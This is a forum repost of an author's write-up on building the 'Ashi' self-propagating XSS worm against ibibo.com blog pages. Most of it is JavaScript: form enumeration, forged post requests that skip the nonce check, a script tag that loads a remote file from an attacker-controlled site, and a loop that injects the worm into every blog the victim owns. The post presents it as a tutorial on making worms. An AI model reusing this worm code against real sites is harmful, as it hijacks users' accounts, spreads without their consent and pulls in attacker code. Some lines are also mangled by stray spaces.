Demystifying The Ashi virus--"vinnu"

Ashi Virus was developed by "vinnu" bhai last year. It was a perfect example of a self propogating virus. Let me post here his original paper. It will give us better view on making worms/virus and also their capabilities.

Vulnerability:- I found several XSS vulnerabilities in ibibo.com. Next, i searched for any good point which can give me a point to autmate the leveraging process. I found two php pages post.php and new-post.php, which can submit my blog posts and bothe the title as well as the content were prone to XSS. So i developed a script to find out the form elements:

javascript:var vin=document.getElementsByTagName("form")[0];var nunnu;for(var iter=0;iter<vin.length;iter++){if(iter==0){nunnu=v in.item(iter).name+"="+vin.item(iter).value;}else{ nunnu+="&"+vin.item(iter).name+"="+vin.item(iter). value;}}alert(nunnu);

The above script retrieves the form elements and their values.So now i had the script (you have to alter above script a little to increase the form index to a suitable value to reach the target form as:

javascript:var vin=document.getElementsByTagName("form")[2];var nunnu;for(var iter=0;iter<vin.length;iter++){if(iter==0){nunnu=v in.item(iter).name+"="+vin.item(iter).value;}else{ nunnu+="&"+vin.item(iter).name+"="+vin.item(iter). value;}}alert(nunnu);

Paste above script in address-bar of the browser when the "http://blogs.ibibo.com/<your-blog>/wp-admin/"
Page will open. I wrote "Namaste" in title & "Hows the life there" in content box. It gave me following in a dialogue
box:
post_title=Namaste&content=Hows the life there&tags_input=&action=post-quickpress-save&quickpress_post_ID=0
&_wpnonce=3a7721d78d&_wp_http_referer=/vulnerable/wp-admin/&save=Save Draft&=Cancel&publish=Publish

It seems like they are checking the referer (_wp_http_referer)and a nonce [_wpnonce] (well nonce is always the same everytimeI tried to post).But still the nonce appears in a page which cannot be directly XSSed. So i just tried to post the request without the referer and nonce.

javascript:blog(); function blog(){var nunnu="><scr"+"ipt language=javascript"+"src='http://sites.google.com/site/urcontrolledsite/ibibo.js'>"+"<scr"+"ipt>";quote="Sahdi bhasa sahdi jaan hai ji, tusaan sunhsaa...";varblpayload="post_title="+quote;alert (nunnu);blpayload+=encodeURIComponent(nunnu);bl
payload+="&content=Jaijeya";blpayload+=encodeURICo mponent(nunnu);blpayload+="hor&t
ags_input=&action=post-quickpresssave&
quickpress_post_ID=0&_wpnonce=&_wp_http_referer=&s ave=Save
%20Draft&=Cancel&publish=Publish";alert(blpayload) ;ajaxPSLV("http://blogs.ibibo.co
m/vulnerable/wp-admin/post.php",blpayload);}function ajaxPSLV(url, payload)
{ alert("url:\t"+url+"\npayload:\n"+payload);var xmlhttp; if
(window.XMLHttpRequest) {xmlhttp = new XMLHttpRequest(); }else if
(window.ActiveXObject) {try {xmlhttp = new ActiveXObject("Microsoft.XMLHTTP");}
catch (e) { try {xmlhttp = new
ActiveXObject("Msxml2.XMLHTTP");} catch (e) { return;}
} } alert("sending");xmlhttp.open("POST", url,
true);xmlhttp.setRequestHeader("Content-Type", "application/x-www-formurlencoded");
xmlhttp.setRequestHeader("Content-length",
payload.length);alert("sending:\t"+payload.length) ;xmlhttp.send(payload);alert("se
nt");}alert("done");

It worked and it posted the blog even without the nonce and referer defined in querystring. But there is a problem.
The script is appearing on the heading and also I wanted the script to post a different topic everytime it gets executed so i introduced the well known following circuit for chosing one of strings out of a list:

var no=Math.floor(Math.random()*10);
var quote=new Array(10);
quote[0]="Sahdi bhasa sahdi jaan...";
quote[1]="Don't you think we can...";
quote[2]="Thats the attitude...Keep it up.";
quote[3]="Intelligent?..";
quote[4]="Main koi machine thodi hai...";
quote[5]="Jaijeya ji! Theek hainn na?...";
quote[6]="Veero! Tusaan Eh bhi parhi leya";
quote[7]="Himachal a heaven...";
quote[8]="Free Tibet...";
quote[9]="Pahari (Kangri) dialoge must be respected and registered as a
language...";
var blpayload="post_title="+quote[no];

After assembling it with above script i got the following code:

javascript:blog();
function blog(){
var nunnu="><scr"+"ipt language=javascript"+"
src='http://sites.google.com/site/urcontrolledsite/ibibo.js'>"+"</scr"+"ipt><a
href=\"\" onmouseover=javascript:blog();>Jaijeya</a><a ";
var no=Math.floor(Math.random()*10);
var quote=new Array(10);
quote[0]="Sahdi bhasa sahdi jaan...";
quote[1]="Don't you think we can...";
quote[2]="Thats the attitude...Keep it up.";
quote[3]="Intelligent?..";
quote[4]="Main koi machine thodi hai...";
quote[5]="Jaijeya ji! Theek hainn na?...";
quote[6]="Veero! Tusaan Eh bhi parhi leya";
quote[7]="Himachal a heaven...";
quote[8]="Free Tibet...";
quote[9]="Pahari (Kangri) dialoge must be respected and registered as a
language...";
var blpayload="post_title="+quote[no];
blpayload+=encodeURIComponent(nunnu);
blpayload+="&content=Jaijeya</p></div";
blpayload+=encodeURIComponent(nunnu);
blpayload+="hor&tags_input=&action=post-quickpresssave&
quickpress_post_ID=0&_wpnonce=&_wp_http_referer=&s ave=Save
%20Draft&=Cancel&publish=Publish";
alert(blpayload); ajaxPSLV("http://blogs.ibibo.com/vulnerable/wpadmin/
post.php",blpayload);
} function ajaxPSLV(url, payload) {
alert("url:\t"+url+"\npayload:\n"+payload);
var xmlhttp; if (window.XMLHttpRequest){
xmlhttp = new XMLHttpRequest();} else if (window.ActiveXObject){
try{xmlhttp = new ActiveXObject("Microsoft.XMLHTTP");}catch(e){
try{xmlhttp = new ActiveXObject("Msxml2.XMLHTTP");}catch(e){
return;}}}alert("sending");xmlhttp.open("POST", url, true);
xmlhttp.setRequestHeader("Content-Type","application/x-www-formurlencoded");
xmlhttp.setRequestHeader("Content-length", payload.length);
alert("sending:\t"+payload.length);
xmlhttp.send(payload);alert("sent");
}alert("done");

But i don't want my worm to just post in a hardcoded blog. It must search for all the blogs of the user and inject the posts as the above post did.To do this i have to check hrefs of all the anchors. Because The blog names are appearing within the page and when we click on any one the respective blog changes.

javascript:var vin=document.getElementsByTagName("a");var nunn="";for(var i=0;i<vin.length;i++){nunn+=vin[i].href+"\n";}alert(nunn);

But there are also several other items along with blogs.So my virus must identify the blogs out of other objects.
I checked the pattern.After a careful inspection, I found that the hrefs which has wp-admin in their href are the references of blogs of the user. So i developed another script to check and it:

javascript:test();
function test() {
var list="";
var vin=document.getElementsByTagName("a");
var total=0;var index=0;var address;
var intex=0;
for(var iter=0;iter<vin.length;iter++){
if((index=vin[iter].href.indexOf("wp-admin"))!=-1){
address=vin[iter].href.substring(0,index+8)+"/post.php";
list += address+"\n";intex++;
}}alert(intex+"\n"+list);}

Now, i have got a way to identify the blogs out of other objects and post the random topics.By combining these all a beast started to take the shape as:

javascript:trigger();
function trigger() {
var vin=document.getElementsByTagName("a");
var total=0;var index=0;var address;
for(var iter=0;iter<vin.length;iter++){
if((index=vin[iter].href.indexOf("wp-admin"))!=-1){
address=vin[iter].href.substring(0,index+8)+"/post.php";
blog(address);
}}}
function blog(addr){
var nunnu="><scr"+"ipt language=javascript"+"
src='http://sites.google.com/site/urcontrolledsite/ibibo.js'>"+"</scr"+"ipt><a
href=\"\" onmouseover=javascript:blog();>Jaijeya</a><a ";
var no=Math.floor(Math.random()*10);
var quote=new Array(10);
quote[0]="Sahdi bhasa sahdi jaan...";
quote[1]="Don't you think we can...";
quote[2]="Thats the attitude...Keep it up.";
quote[3]="Intelligent?..";
quote[4]="Main koi machine thodi hai...";
quote[5]="Jaijeya ji! Theek hainn na?...";
quote[6]="Veero! Tusaan Eh bhi parhi leya";
quote[7]="Himachal a heaven...";
quote[8]="Free Tibet...";
quote[9]="Pahari (Kangri) dialoge must be respected and registered as a
language...";
var blpayload="post_title="+quote[no];
blpayload+=encodeURIComponent(nunnu);
blpayload+="&content=Jaijeya</p></div";
blpayload+=encodeURIComponent("><"+"sc"+"ript language=javascript>var
ashi='"+nunnu+"';eval(ashi);<"+"/sc"+"ript>");
blpayload+="hor&tags_input=&action=post-quickpresssave&
quickpress_post_ID=0&_wpnonce=&_wp_http_referer=&s ave=Save
%20Draft&=Cancel&publish=Publish";
alert(blpayload); ajaxPSLV(addr,blpayload);
}
function ajaxPSLV(url, payload) {
alert("url:\t"+url+"\npayload:\n"+payload);
var xmlhttp; if (window.XMLHttpRequest){
xmlhttp = new XMLHttpRequest();} else if (window.ActiveXObject){
try{xmlhttp = new ActiveXObject("Microsoft.XMLHTTP");}catch(e){
try{xmlhttp = new ActiveXObject("Msxml2.XMLHTTP");}catch(e){
return;}}}alert("sending");xmlhttp.open("POST", url, true);
xmlhttp.setRequestHeader("Content-Type","application/x-www-formurlencoded");
xmlhttp.setRequestHeader("Content-length", payload.length);
alert("sending:\t"+payload.length);
xmlhttp.send(payload);alert("sent");
};

But i thought the title was not a good place to inject the code as it will appear in dashboard. So I placed the code in the argument of post.php named "content" instead of "post_title".The variable "nunnu" contains the code for a script which retrieves the remote javascript file at:
http://sites.google.com/site/urcontrolledsite/ibibo.js